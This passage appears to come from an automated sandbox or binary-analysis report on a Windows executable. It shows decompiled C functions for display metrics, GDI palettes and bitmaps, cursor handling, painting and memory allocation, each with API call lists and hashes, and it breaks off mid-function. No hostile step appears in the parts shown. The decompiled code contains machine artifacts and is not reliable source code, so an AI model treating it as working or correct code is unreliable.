        _t27 = *0x466328; // 0x4231b8
        *0x466328 = E00422CE4(6, _t24, _t27, _t28, _t30);
        _t25 = *0x466328(_t28, _t30);
    }
    return _t25;
}

                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423210
                                                                            • GetSystemMetrics.USER32 ref: 00423225
                                                                            • GetSystemMetrics.USER32 ref: 00423230
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0042325A
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • GetMonitorInfoW , xrefs: 004231D0
                                                                            • DISPLAY , xrefs: 00423251
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                            • API String ID: 2545840971-2774842281
                                                                            • Opcode ID: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d
                                                                            • Instruction ID: 96bab24b47e879cbfe0bd9bf5b7a96c5a668f0bc15fc1324eeb591fd9e87288a
                                                                            • Opcode Fuzzy Hash: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d
                                                                            • Instruction Fuzzy Hash: 5B119071B00320AED720CF65AC447A7B7A8EB05721F40456AED4597350D6B8BA44CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
E00428588(int __eax, void* __ecx, intOrPtr __edx) {
    intOrPtr _v8;
    struct HDC__* _v12;
    struct HDC__* _v16;
    void* _v20;
    struct tagRGBQUAD _v1044;
    int _t16;
    int _t37;
    intOrPtr _t44;
    void* _t46;
    void* _t49;
    void* _t51;
    intOrPtr _t52;

    _t16 = __eax;
    _t49 = _t51;
    _t52 = _t51 + 0xfffffbf0;
    _v8 = __edx;
    _t46 = __eax;
    if(__eax == 0 || *((short*)(__ecx + 0x26)) > 8) {
        L4:
        return _t16;
    } else {
        _t16 = E004273B0(_v8, 0xff, &_v1044);
        _t37 = _t16;
        if(_t37 == 0) {
            goto L4;
        } else {
            _v12 = GetDC(0);
            _v16 = CreateCompatibleDC(_v12);
            _v20 = SelectObject(_v16, _t46);
            _push(_t49);
            _push(0x428637);
            _push( *[fs:eax]);
            *[fs:eax] = _t52;
            SetDIBColorTable(_v16, 0, _t37, &_v1044);
            _pop(_t44);
            *[fs:eax] = _t44;
            _push(0x42863e);
            SelectObject(_v16, _v20);
            DeleteDC(_v16);
            return ReleaseDC(0, _v12);
        }
    }
}

                                                                            APIs
                                                                              • Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7
                                                                              • Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA
                                                                            • GetDC.USER32(00000000), ref: 004285C6
                                                                            • CreateCompatibleDC.GDI32(?), ref: 004285D2
                                                                            • SelectObject.GDI32(?), ref: 004285DF
                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603
                                                                            • SelectObject.GDI32(?,?), ref: 0042861D
                                                                            • DeleteDC.GDI32(?), ref: 00428626
                                                                            • ReleaseDC.USER32 ref: 00428631
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                            • String ID:
                                                                            • API String ID: 4046155103-0
                                                                            • Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826
                                                                            • Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
E00454B28(struct HICON__* __eax, short __edx) {
    short _v18;
    long _v20;
    struct tagPOINT _v28;
    struct HICON__* _t11;
    long _t16;
    struct HICON__* _t25;
    struct HWND__* _t28;
    short _t29;
    struct tagPOINT* _t31;

    _t11 = __eax;
    _t29 = __edx;
    _t25 = __eax;
    if(__edx == *((intOrPtr*)(__eax + 0x44))) {
        L6:
        *((intOrPtr*)(_t25 + 0x48)) = *((intOrPtr*)(_t25 + 0x48)) + 1;
        return _t11;
    }
    *((short*)(__eax + 0x44)) = __edx;
    if(__edx != 0) {
        L5:
        _t11 = SetCursor(E00454B00(_t25, _t29));
        goto L6;
    }
    GetCursorPos(_t31);
    _push(_v28.y);
    _t28 = WindowFromPoint(_v28.x);
    if(_t28 == 0) {
        goto L5;
    }
    _t16 = GetWindowThreadProcessId(_t28, 0);
    if(_t16 != GetCurrentThreadId()) {
        goto L5;
    }
    _v20 = _v28 & 0x0000ffff;
    _v18 = _v28.y & 0x0000ffff;
    return SendMessageA(_t28, 0x20, _t28, SendMessageA(_t28, 0x84, 0, _v20) & 0x0000ffff | 0x02000000);
}

                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 00454B43
                                                                            • WindowFromPoint.USER32(?,?), ref: 00454B50
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454B5E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00454B65
                                                                            • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454B8E
                                                                            • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 00454BA0
                                                                            • SetCursor.USER32(00000000), ref: 00454BB2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1770779139-0
                                                                            • Opcode ID: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9
                                                                            • Instruction ID: 855e5610ba6024dcea5ecb996c65caa1e9501b556084f3035492505de70d9607
                                                                            • Opcode Fuzzy Hash: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9
                                                                            • Instruction Fuzzy Hash: 9E01D63150824066C6207B668C81F3B36A4DFC4B59F10446FBE88AA2D2E63DEC44936E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
E0044F90C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    intOrPtr* _v8;
    intOrPtr* _v12;
    struct HDC__* _v16;
    struct tagPAINTSTRUCT _v80;
    struct tagRECT _v96;
    struct tagRECT _v112;
    signed int _v116;
    long _v120;
    void* __ebp;
    void* _t68;
    void* _t94;
    struct HBRUSH__* _t97;
    intOrPtr _t105;
    void* _t118;
    void* _t127;
    intOrPtr _t140;
    intOrPtr _t146;
    void* _t147;
    void* _t148;
    void* _t150;
    void* _t152;
    intOrPtr _t153;

    _t148 = __esi;
    _t147 = __edi;
    _t138 = __edx;
    _t127 = __ebx;
    _t150 = _t152;
    _t153 = _t152 + 0xffffff8c;
    _v12 = __edx;
    _v8 = __eax;
    _t68 = *_v12 - 0xf;
    if(_t68 == 0) {
        _v16 = *(_v12 + 4);
        if(_v16 == 0) {
            *(_v12 + 4) = BeginPaint( *(_v8 + 0x29c), &_v80);
        }
        _push(_t150);
        _push(0x44fada);
        _push( *[fs:eax]);
        *[fs:eax] = _t153;
        if(_v16 == 0) {
            GetWindowRect( *(_v8 + 0x29c), &_v96);
            E0043A55C(_v8, &_v120, &_v96);
            _v96.left = _v120;
            _v96.top = _v116;
            E00439028( *(_v12 + 4), ~(_v96.top), ~(_v96.left));
        }
        E0043FDA8(_v8, _t127, _v12, _t147, _t148);
        _pop(_t140);
        *[fs:eax] = _t140;
        _push(0x44fae8);
        if(_v16 == 0) {
            return EndPaint( *(_v8 + 0x29c), &_v80);
        }
        return 0;
    } else {
        _t94 = _t68 - 5;
        if(_t94 == 0) {
            _t97 = E004261BC( *((intOrPtr*)(_v8 + 0x1a4)));
            *((intOrPtr*)( *_v8 + 0x44))();
            FillRect( *(_v12 + 4), &_v112, _t97);
            if( *((char*)(_v8 + 0x277)) == 2 && *(_v8 + 0x29c) != 0) {
                GetClientRect( *(_v8 + 0x29c), &_v96);
                FillRect( *(_v12 + 4), &_v96, E004261BC( *((intOrPtr*)(_v8 + 0x1a4))));
            }
            _t105 = _v12;
            *((intOrPtr*)(_t105 + 0xc)) = 1;
        } else {
            _t118 = _t94 - 0x2b;
            if(_t118 == 0) {
                E0044F880(_t150);
                _t105 = _v8;
                if( *((char*)(_t105 + 0x277)) == 2) {
                    if(E00450190(_v8) == 0 || E0044F8CC(_t138, _t150) == 0) {
                        _t146 = 1;
                    } else {
                        _t146 = 0;
                    }
                    _t105 = E0044C934( *(_v8 + 0x29c), _t146);
                }
            } else {
                if(_t118 != 0x45) {
                    _t105 = E0044F880(_t150);
                } else {
                    E0044F880(_t150);
                    _t105 = _v12;
                    if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                        _t105 = _v12;
                        *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                    }
                }
            }
        }
        return _t105;
    }
}

                                                                            APIs
                                                                            • FillRect.USER32 ref: 0044F985
                                                                            • GetClientRect.USER32 ref: 0044F9B0
                                                                            • FillRect.USER32 ref: 0044F9CF
                                                                              • Part of subcall function 0044F880: CallWindowProcA.USER32 ref: 0044F8BA
                                                                            • BeginPaint.USER32(?,?), ref: 0044FA47
                                                                            • GetWindowRect.USER32 ref: 0044FA74
                                                                            • EndPaint.USER32(?,?,0044FAE8), ref: 0044FAD4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                            • String ID:
                                                                            • API String ID: 901200654-0
                                                                            • Opcode ID: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60
                                                                            • Instruction ID: 44bf8864a589ba947b4fad5018ef312e79812de65eda3363066782ea35254d35
                                                                            • Opcode Fuzzy Hash: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60
                                                                            • Instruction Fuzzy Hash: A851EB74A00108EFDB00DBA9D589E9EB7F8AF09314F6581B6E409AB352D738AE45CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
E00427660(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) {
    intOrPtr* _v8;
    intOrPtr _v12;
    signed int _v16;
    intOrPtr _v20;
    signed int _v24;
    signed int _v32;
    struct HDC__* _v44;
    signed int* _t36;
    signed int _t39;
    signed int _t42;
    signed int* _t52;
    signed int _t56;
    intOrPtr _t66;
    void* _t72;
    void* _t73;
    void* _t74;
    intOrPtr _t75;

    _t73 = _t74;
    _t75 = _t74 + 0xffffff90;
    _v16 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    _t52 = _a8;
    _v24 = _v16 << 4;
    _v20 = E00402CF4(_v24);
    *[fs:edx] = _t75;
    _t56 = _v24;
    *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427959, _t73, __edi, __esi, __ebx, _t72);
    if(( *_t52 | _t52[1]) != 0) {
        _t36 = _a4;
        *_t36 = *_t52;
        _t36[1] = _t52[1];
    } else {
        *_a4 = GetSystemMetrics(0xb);
        _a4[1] = GetSystemMetrics(0xc);
    }
    _v44 = GetDC(0);
    if(_v44 == 0) {
        E00426B18(_t56);
    }
    _push(_t73);
    _push(0x427749);
    _push( *[fs:edx]);
    *[fs:edx] = _t75;
    _t39 = GetDeviceCaps(_v44, 0xe);
    _t42 = _t39 * GetDeviceCaps(_v44, 0xc);
    if(_t42 <= 8) {
        _v32 = 1 << _t42;
    } else {
        _v32 = 0x7fffffff;
    }
    _pop(_t66);
    *[fs:eax] = _t66;
    _push(0x427750);
    return ReleaseDC(0, _v44);
}

                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 004276AE
                                                                            • GetSystemMetrics.USER32 ref: 004276BA
                                                                            • GetDC.USER32(00000000), ref: 004276D6
                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004276FD
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042770A
                                                                            • ReleaseDC.USER32 ref: 00427743
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                            • String ID:
                                                                            • API String ID: 447804332-0
                                                                            • Opcode ID: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773
                                                                            • Instruction ID: 73986ba3f22e50cd3a10517d1b4e47993adae367a89b78d8e0850655de09d4be
                                                                            • Opcode Fuzzy Hash: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773
                                                                            • Instruction Fuzzy Hash: 72314374E04255DFEB00DF65C881AAEBBF5FB49310F50816AF914AB381C678AD41CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
E00427AC0(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
    char _v5;
    struct HPALETTE__* _v12;
    struct HDC__* _v16;
    struct tagBITMAPINFO* _t36;
    intOrPtr _t43;
    struct HBITMAP__* _t47;
    void* _t50;
    void* _t56;

    _t36 = __ecx;
    _t47 = __eax;
    E0042796C(__eax, _a4, __ecx, _t56);
    _v12 = 0;
    _v16 = CreateCompatibleDC(0);
    _push(_t50);
    _push(0x427b5d);
    _push( *[fs:eax]);
    *[fs:eax] = _t50 + 0xfffffff4;
    if(__edx != 0) {
        _v12 = SelectPalette(_v16, __edx, 0);
        RealizePalette(_v16);
    }
    _v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
    _pop(_t43);
    *[fs:eax] = _t43;
    _push(E00427B64);
    if(_v12 != 0) {
        SelectPalette(_v16, _v12, 0);
    }
    return DeleteDC(_v16);
}


                                                                            APIs
                                                                              • Part of subcall function 0042796C: GetObjectA.GDI32(?,00000054), ref: 00427980
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00427AE2
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00427B03
                                                                            • RealizePalette.GDI32(?), ref: 00427B0F
                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427B26
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00427B4E
                                                                            • DeleteDC.GDI32(?), ref: 00427B57
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                            • String ID:
                                                                            • API String ID: 1221726059-0
                                                                            • Opcode ID: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492
                                                                            • Instruction ID: 962af5e7cc7204e74324ac0cd40ad7ab2ef4d8fef8aaa126dedc15750c7fb750
                                                                            • Opcode Fuzzy Hash: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492
                                                                            • Instruction Fuzzy Hash: C2118F75B04304BBDB10DBA9CC81F5EBBFCEF49704F5184AAB514E7281D678A9008768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0042730C(void* __eax, signed short __ecx) {
    char _v1036;
    signed short _v1038;
    struct tagRGBQUAD _v1048;
    short _v1066;
    void* __ebx;
    void* _t19;
    void* _t24;
    struct HDC__* _t25;
    void* _t29;
    void* _t32;
    struct HPALETTE__* _t34;
    LOGPALETTE* _t35;

    _t32 = __eax;
    _t34 = 0;
    _t35->palVersion = 0x300;
    if(__eax == 0) {
        _v1038 = __ecx;
        E00402EFC(_t29, _t24, __ecx + __ecx + __ecx + __ecx,  &_v1036);
    } else {
        _t25 = CreateCompatibleDC(0);
        _t19 = SelectObject(_t25, _t32);
        _v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
        SelectObject(_t25, _t19);
        DeleteDC(_t25);
    }
    if(_v1038 != 0) {
        if(_v1038 != 0x10 || E00427274(_t35) == 0) {
            E00427108( &_v1036, _v1038 & 0x0000ffff);
        }
        _t34 = CreatePalette(_t35);
    }
    return _t34;
}


                                                                            APIs
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00427325
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0042732E
                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00429843,?,?,?,?,00428423), ref: 00427342
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0042734E
                                                                            • DeleteDC.GDI32(00000000), ref: 00427354
                                                                            • CreatePalette.GDI32 ref: 0042739B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                            • String ID:
                                                                            • API String ID: 2515223848-0
                                                                            • Opcode ID: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92
                                                                            • Instruction ID: 4a95b8b0959ba2db041035c6acb415e503d43549d7c2ca44117eec6569594a82
                                                                            • Opcode Fuzzy Hash: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92
                                                                            • Instruction Fuzzy Hash: 4501C46130C32062E614B3269C43B6F72F89FC0718F55C82FB989A72C2E67D8804939E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004269F4(void* __eax) {
    void* _t36;

    _t36 = __eax;
    UnrealizeObject(E004261BC( *((intOrPtr*)(__eax + 0x14))));
    SelectObject( *(_t36 + 4), E004261BC( *((intOrPtr*)(_t36 + 0x14))));
    if(E0042629C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
        SetBkColor( *(_t36 + 4),  !(E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14))))));
        return SetBkMode( *(_t36 + 4), 1);
    } else {
        SetBkColor( *(_t36 + 4), E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14)))));
        return SetBkMode( *(_t36 + 4), "true");
    }
}


                                                                            APIs
                                                                              • Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267
                                                                            • UnrealizeObject.GDI32(00000000), ref: 00426A00
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426A12
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00426A35
                                                                            • SetBkMode.GDI32(?,?), ref: 00426A40
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00426A5B
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00426A66
                                                                              • Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                            • String ID:
                                                                            • API String ID: 3527656728-0
                                                                            • Opcode ID: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f
                                                                            • Instruction ID: 79df315320e9c6d7b3654dfc87e14d29fd340cea2b97e5c1a1a8a26441f2275c
                                                                            • Opcode Fuzzy Hash: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f
                                                                            • Instruction Fuzzy Hash: 98F06BB57001109BDB04FFBAE9C6E1B6BA85F04309755449AB909DF197C939E8208739
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E00401820(signed int __eax) { 				signed int __ebx; 				signed int __edi; 				signed int __esi; 				intOrPtr* _t99; 				signed int _t104; 				signed int _t109; 				signed int _t110; 				intOrPtr* _t114; 				void* _t116; 				intOrPtr* _t121; 				signed int _t125; 				signed int _t129; 				signed int _t131; 				signed int _t132; 				signed int _t133; 				signed int _t134; 				signed int _t135; 				unsigned int _t141; 				signed int _t142; 				void* _t144; 				intOrPtr* _t147; 				intOrPtr _t148; 				signed int _t150; 				long _t156; 				intOrPtr _t159; 				signed int _t162;  				_t129 =  *0x46304d; // 0x0 				if(__eax > 0xa2c) { 					__eflags = __eax - 0x40a2c; 					if(__eax > 0x40a2c) { 						_pop(_t120); 						__eflags = __eax; 						if(__eax >= 0) { 							_push(_t120); 							_t162 = __eax; 							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; 							_t121 = VirtualAlloc(0, _t156, 0x101000, 4); 							if(_t121 != 0) { 								_t147 = _t121; 								 *((intOrPtr*)(_t147 + 8)) = _t162; 								 *(_t147 + 0xc) = _t156 | 0x00000004; 								E00401740(); 								_t99 =  *0x4657b0; // 0x4657ac 								 *_t147 = 0x4657ac; 								 *0x4657b0 = _t121; 								 *((intOrPtr*)(_t147 + 4)) = _t99; 								 *_t99 = _t121; 								 *0x4657a8 = 0; 								_t121 = _t121 + 0x10; 							} 							return _t121; 						} else { 							__eflags = 0; 							return 0; 						} 					} else { 						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; 						__eflags = _t129; 						if(__eflags != 0) { 							while(1) { 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags == 0) { 									goto L39; 								} 								Sleep(0); 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags != 0) { 									Sleep(0xa); 									continue; 								} 								goto L39; 							} 						} 						L39: 						_t141 = _t125 - 0xb30; 						_t142 = _t141 
>> 0xd; 						_t131 = _t141 >> 8; 						_t104 = 0xffffffff << _t131 &  *(0x463728 + _t142 * 4); 						__eflags = 0xffffffff; 						if(0xffffffff == 0) { 							_t132 = _t142; 							__eflags = 0xfffffffe << _t132 &  *0x463724; 							if((0xfffffffe << _t132 &  *0x463724) == 0) { 								_t133 =  *0x463720; // 0x3a290 								_t134 = _t133 - _t125; 								__eflags = _t134; 								if(_t134 < 0) { 									_t109 = E004016C8(_t125); 								} else { 									_t110 =  *0x46371c; // 0x26fa2a0 									_t109 = _t110 - _t125; 									 *0x46371c = _t109; 									 *0x463720 = _t134; 									 *(_t109 - 4) = _t125 | 0x00000002; 								} 								 *0x463718 = 0; 								return _t109; 							} else { 								asm("bsf edx, eax"); 								asm("bsf ecx, eax"); 								_t135 = _t132 | _t142 << 0x00000005; 								goto L47; 							} 						} else { 							asm("bsf eax, eax"); 							_t135 = _t131 & 0xffffffe0 | _t104; 							L47: 							_push(_t152); 							_push(_t145); 							_t148 = 0x4637a8 + _t135 * 8; 							_t159 =  *((intOrPtr*)(_t148 + 4)); 							_t114 =  *((intOrPtr*)(_t159 + 4)); 							 *((intOrPtr*)(_t148 + 4)) = _t114; 							 *_t114 = _t148; 							__eflags = _t148 - _t114; 							if(_t148 == _t114) { 								asm("rol eax, cl"); 								_t80 = 0x463728 + _t142 * 4; 								 *_t80 =  *(0x463728 + _t142 * 4) & 0xfffffffe; 								__eflags =  *_t80; 								if( *_t80 == 0) { 									asm("btr [0x463724], edx"); 								} 							} 							_t150 = 0xfffffff0 &  *(_t159 - 4); 							_t144 = 0xfffffff0 - _t125; 							__eflags = 0xfffffff0; 							if(0xfffffff0 == 0) { 								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]); 								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7; 								__eflags =  *_t89; 							} else { 								_t116 = _t125 + _t159; 								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; 								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0; 								__eflags = 0xfffffff0 - 0xb30; 								if(0xfffffff0 >= 0xb30) { 									E004015FC(_t116, 0xfffffffffffffff3, 
_t144); 								} 							} 							 *(_t159 - 4) = _t125 + 2; 							 *0x463718 = 0; 							return _t159; 						} 					} 				} else { 					__eflags = __cl; 					__eax =  *(__edx + 0x4635c0) & 0x000000ff; 					__ebx = 0x46103c + ( *(__edx + 0x4635c0) & 0x000000ff) * 8; 					if(__eflags != 0) { 						while(1) { 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__eflags == 0) { 								goto L5; 							} 							__ebx = __ebx + 0x20; 							__eflags = __ebx; 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__ebx != 0) { 								__ebx = __ebx + 0x20; 								__eflags = __ebx; 								__eax = 0x100; 								asm("lock cmpxchg [ebx], ah"); 								if(__ebx != 0) { 									__ebx = __ebx - 0x40; 									__eflags = __ebx; 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [ebx], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 								} 							} 							goto L5; 						} 					} 					L5: 					__edx =  *(__ebx + 4); 					__eax =  *(__edx + 8); 					__ecx = 0xfffffff8; 					__eflags = __edx - __ebx; 					if(__edx == __ebx) { 						__edx =  *(__ebx + 0x10); 						__ecx =  *(__ebx + 2) & 0x0000ffff; 						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; 						__eflags = __eax -  *(__ebx + 0xc); 						if(__eax >  *(__ebx + 0xc)) { 							_push(__esi); 							_push(__edi); 							__eflags =  *0x46304d; 							if(__eflags != 0) { 								while(1) { 									__eax = 0x100; 									asm("lock cmpxchg [0x463718], ah"); 									if(__eflags == 0) { 										goto L20; 									} 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [0x463718], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 									goto L20; 								} 							} 							L20: 							 *(__ebx + 1) =  *(__ebx + 1) &  *0x463724; 							__eflags =  *(__ebx + 1) &  *0x463724; 							if(( *(__ebx + 1) &  *0x463724) == 0) { 								__ecx =  *(__ebx + 0x18) & 0x0000ffff; 								__edi 
